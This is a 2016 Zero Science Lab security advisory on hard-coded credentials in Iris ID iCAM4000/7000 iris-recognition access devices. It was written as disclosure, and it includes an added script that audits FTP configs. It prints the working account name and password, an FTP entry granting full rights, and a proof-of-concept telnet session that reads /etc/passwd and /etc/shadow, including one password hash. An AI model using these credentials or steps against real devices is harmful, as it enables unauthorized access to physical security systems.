Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access

2016-07-26T00:00:00
ID ZSL-2016-5347
Type zeroscience
Reporter Gjoko Krstic
Modified 2016-07-26T00:00:00

Description

Title: Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access
Advisory ID: ZSL-2016-5347
Type: Local/Remote
Impact: System Access
Risk: (5/5)
Release Date: 26.07.2016

Summary

The 4th generation IrisAccess™ 7000 series iris recognition solution offered by Iris ID provides fast, secure, and highly accurate, non-contact identification by the iris of the eye. The iCAM7000's versatility and flexibility allow for easy integration with many Wiegand and network based access control, time and attendance, visitor management and point of sale applications.

The iCAM4000 or 4010 with embedded smart card is the best-selling model in the IrisAccess 4000 range. With simultaneous two-eye capture, a face-badging camera and motorized height adjustment, the iCAM4000 is easily configured for use in a kiosk as well as in applications where a traditional wall mount is used.

Description

The Iris ID IrisAccess iCAM4000/7000 series suffers from use of hard-coded credentials. When the device interface is visited with a browser on port 80, the application loads an applet JAR file 'ICAMClient.jar' into the user's browser which serves additional admin features. In the JAR file there is an account 'rou' with password 'iris4000' that has read and limited write privileges on the affected node. An attacker can access the device using these credentials by starting a simple telnet session on port 23, gaining access to sensitive information, and/or via FTP on port 21 (where the account has EVERYTHING allowed), uploading malicious content.

--------------------------------------------------------------------------------

/html/ICAMClient.jar (ICAMClient.java):
---------------------------------------

97:  param_host = getParameter("host");
98:  param_user = "rou";//getParameter("user");
99:  param_pass = "iris4000";//getParameter("pass"); // password
100: param_path = getParameter("path"); // path on the server

/etc/ftpd/ftpd.conf:
--------------------

69:  # User list:
70:  # Format:  user=<login> <passwd> <subdir> <maxlogins> <flags>
71:  #           <login>     user name
72:  #           <passwd>    password or * for anonymous access
73:  #           <subdir>    (internally appended to serverroot)
74:  #                       the user has access to the WHOLE SUBTREE,
75:  #                       if the server has access to it
76:  #           <maxlogins> maximal logins with this usertype
77:  #           <flags>     D - download
78:  #                       U - upload + making directories
79:  #                       O - overwrite existing files
80:  #                       M - allows multiple logins
81:  #                       E - allows erase operations
82:  #                       A - allows EVERYTHING(!)
101:
103: user=rou iris4000 / 5 A
--------------------------------------------------------------------------------
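As an added defensive check (not part of the advisory or the vendor's software), the following Python script parses the `user=<login> <passwd> <subdir> <maxlogins> <flags>` list format quoted above and reports the properties that make an entry like `user=rou iris4000 / 5 A` dangerous: the A flag, a subdir of `/`, and a clear-text password. The sample configuration is constructed for the example; only the 'rou' line comes from the advisory.

```python
"""Audit an ftpd.conf user list for over-privileged or hard-coded accounts.

Parses the user= format quoted in the advisory from /etc/ftpd/ftpd.conf:
    user=<login> <passwd> <subdir> <maxlogins> <flags>
and reports the properties that made the 'rou' entry dangerous.
"""
import re
from typing import Dict, List

# Constructed sample (not the device's real file): the 'rou' line is the one
# reported in the advisory, the other two are made up for contrast.
SAMPLE_FTPD_CONF = """\
# User list:
# Format:  user=<login> <passwd> <subdir> <maxlogins> <flags>
user=rou iris4000 / 5 A
user=anonymous * /pub 10 D
user=ops secret /upload 2 DUO
"""

# One user= entry; the flag letters are those documented in the config comments.
USER_LINE = re.compile(r"^user=(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s+([DUOMEA]+)\s*$")

def parse_users(conf_text: str) -> List[Dict[str, object]]:
    """Return one dict per user= entry; comments, blanks and other lines are skipped."""
    users = []
    for raw in conf_text.splitlines():
        line = raw.strip()
        m = USER_LINE.match(line)
        if line.startswith("#") or not m:
            continue
        login, passwd, subdir, maxlogins, flags = m.groups()
        users.append({"login": login, "passwd": passwd, "subdir": subdir,
                      "maxlogins": int(maxlogins), "flags": flags})
    return users

def audit_users(conf_text: str) -> Dict[str, List[str]]:
    """Map each risky login to the findings against it; clean entries are omitted."""
    findings: Dict[str, List[str]] = {}
    for u in parse_users(conf_text):
        flags, issues = str(u["flags"]), []
        if "A" in flags:
            issues.append("flag A: everything allowed (upload, overwrite, erase)")
        elif set(flags) & set("UOE"):
            issues.append("write access via flags " + "".join(sorted(set(flags) & set("UOE"))))
        if u["subdir"] == "/":
            issues.append("subdir '/' exposes the whole server tree")
        if u["passwd"] != "*":
            issues.append("clear-text password stored in ftpd.conf")
        if issues:
            findings[str(u["login"])] = issues
    return findings

if __name__ == "__main__":
    for login, issues in audit_users(SAMPLE_FTPD_CONF).items():
        print(login, "->", "; ".join(issues))
```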

Vendor

Iris ID, Inc. - <http://www.irisid.com>

Affected Version

iCAM4000:
iCAM Software: 3.09.02
iCAM File system: 1.3
CMR Firmware: 5.5 and 3.8
EIF Firmware: 9.5 and 8.0
HID iClass Library: 2.01.05
ImageData Library: 1.153
Command Process: 1.02

iCAM7000:
iCAM Software: 8.01.07
iCAM File system: 1.4.0
EIF Firmware: 1.9
HID iClass Library: 1.00.00
ImageData Library: 01.01.32
EyeSeek Library: 5.00
Countermeasure Library: 3.00
LensFinder Library: 5.00
Tilt Assist Library: 4.00

Tested On

GNU/Linux 2.4.19 (armv5tel)

Vendor Status

[06.05.2016] Vulnerability discovered.
[09.05.2016] Vendor contacted.
[12.06.2016] Vendor contacted again.
[26.07.2016] No response from the vendor.
[27.07.2016] Public security advisory released.

PoC

irisid_hardcoded.txt

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <https://www.exploit-db.com/exploits/40167/>
[2] <https://cxsecurity.com/issue/WLB-2016070201>
[3] <https://packetstormsecurity.com/files/138078>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/115506>

Changelog

[26.07.2016] - Initial release
[27.07.2016] - Added reference [1], [2] and [3]
[29.07.2016] - Added reference [4]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access


Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
                  http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess4000/
                  http://www.irisid.com/productssolutions/hardwareproducts/icam4000series/
                  http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess7000/
                  http://www.irisid.com/productssolutions/hardwareproducts/icam7-series/



Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5347
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5347.php


06.05.2016

--


telnet [IP]
iCAM4000 login: rou
Password:
[rou@iCAM4000 rou]# id
uid=500(rou) gid=500(rou) groups=500(rou)
[rou@iCAM4000 rou]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
rou:x:500:500::/home/rou:/bin/bash
[rou@iCAM4000 rou]# cd /web
[rou@iCAM4000 /web]# ls -al
total 0
drwxrwxr-x    1 rou      rou             0 Jul 26 07:22 .
drwxr-xr-x    1 root     root            0 Jan  1  1970 ..
drwxrwxr-x    1 rou      rou             0 Jan 31  2013 cgi-bin
drwxrwxr-x    1 rou      rou             0 Jan 31  2013 html
drwxrwxr-x    1 rou      rou             0 Jan 31  2013 images
[rou@iCAM4000 /web]# cat /etc/shadow
root:{{REMOVED}}
bin:*:10897:0:99999:7:::
daemon:*:10897:0:99999:7:::
adm:*:10897:0:99999:7:::
lp:*:10897:0:99999:7:::
sync:*:10897:0:99999:7:::
shutdown:*:10897:0:99999:7:::
halt:*:10897:0:99999:7:::
mail:*:10897:0:99999:7:::
news:*:10897:0:99999:7:::
uucp:*:10897:0:99999:7:::
operator:*:10897:0:99999:7:::
games:*:10897:0:99999:7:::
gopher:*:10897:0:99999:7:::
ftp:*:10897:0:99999:7:::
nobody:*:10897:0:99999:7:::
rou:$1$LfhrWa0e$Crfm4qz7MFEaWaA77NFci0:12702:0:99999:7:::
[rou@iCAM4000 /web]# cat /etc/issue

Iris@ID iCAM4000 Linux (experimental)
Kernel 2.4.19-rmk7-pxa1 on an armv5tel
[rou@iCAM4000 /web]# ls -al html/
total 289
drwxrwxr-x    1 rou      rou             0 Jan 31  2013 .
drwxrwxr-x    1 rou      rou             0 Jul 26 07:22 ..
-rw-rw-r--    1 rou      rou          4035 Jan 31  2013 DHCPSettings_reboot.htm
-rw-rw-r--    1 rou      rou        100614 Jan 10  2008 ICAMClient.jar
-rw-rw-r--    1 rou      rou          6376 Jan 31  2013 WiegandSettings.htm
-rw-rw-r--    1 rou      rou          5643 Jan 31  2013 authentication.htm
-rw-rw-r--    1 rou      rou          6166 Jan 31  2013 changeusername.htm
-rw-rw-r--    1 rou      rou          4816 Jan 31  2013 displayconfigsettings.htm
-rw-rw-r--    1 rou      rou          5643 Jan 31  2013 downloadauthentication.htm
-rw-rw-r--    1 rou      rou          4850 Jan 31  2013 downloadvoice_result.htm
-rw-rw-r--    1 rou      rou          3237 Jan 31  2013 error.htm
-rw-rw-r--    1 rou      rou          3234 Jan 31  2013 error_ip.htm
-rw-rw-r--    1 rou      rou          3248 Jan 31  2013 error_loginfailure.htm
-rw-rw-r--    1 rou      rou          3349 Jan 31  2013 error_usb_ip.htm
-rw-rw-r--    1 rou      rou          6128 Jan 31  2013 ftpupload.htm
-rw-rw-r--    1 rou      rou          5331 Jan 31  2013 iCAMConfig.htm
-rw-rw-r--    1 rou      rou          4890 Jan 31  2013 icamconfig_reboot.htm
-rw-rw-r--    1 rou      rou          5314 Jan 31  2013 index.htm
-rw-rw-r--    1 rou      rou          7290 Jan 31  2013 main.htm
-rw-rw-r--    1 rou      rou          3662 Jan 31  2013 reboot_result.htm
-rw-rw-r--    1 rou      rou          5782 Jan 31  2013 smartcardauthentication.htm
-rw-rw-r--    1 rou      rou         17783 Jan 31  2013 smartcardconfig.htm
-rw-rw-r--    1 rou      rou          4895 Jan 31  2013 smartcardconfig_reboot.htm
-rw-rw-r--    1 rou      rou          5809 Jan 31  2013 smartcardconfig_result.htm
-rw-rw-r--    1 rou      rou          3672 Jan 31  2013 systeminfo.htm
-rw-rw-r--    1 rou      rou          5870 Jan 31  2013 updateicamconfig.htm
-rw-rw-r--    1 rou      rou          4239 Jan 31  2013 updateicamconfig_result.htm
-rw-rw-r--    1 rou      rou          6612 Jan 31  2013 updatenetworksettings.htm
-rw-rw-r--    1 rou      rou          4651 Jan 31  2013 updatenetworksettings_result.htm
-rw-rw-r--    1 rou      rou          5014 Jan 31  2013 updatenetworksettings_state.htm
-rw-rw-r--    1 rou      rou          3985 Jan 31  2013 upload.htm
-rw-rw-r--    1 rou      rou          5645 Jan 31  2013 uploadauthentication.htm
-rw-rw-r--    1 rou      rou          4737 Jan 31  2013 uploadiriscapture_result.htm
-rw-rw-r--    1 rou      rou          6028 Jan 31  2013 voicemessagedownload.htm
-rw-rw-r--    1 rou      rou          6299 Jan 31  2013 voicemessageupdate.htm
-rw-rw-r--    1 rou      rou          5645 Jan 31  2013 wiegandauthentication.htm
-rw-rw-r--    1 rou      rou          4893 Jan 31  2013 wiegandconfig_reboot.htm
[rou@iCAM4000 /web]# echo $SHELL
/bin/bash
[rou@iCAM4000 /web]# echo pwn > test.write
[rou@iCAM4000 /web]# cat test.write
pwn
[rou@iCAM4000 /web]# rm -rf test.write
[rou@iCAM4000 /web]# cd /etc/ftpd
[rou@iCAM4000 ftpd]# pwd
/etc/ftpd
[rou@iCAM4000 ftpd]# cat ftpd.conf |grep user=rou
user=rou iris4000 / 5 A
[rou@iCAM4000 ftpd]# ^D
Connection to host lost.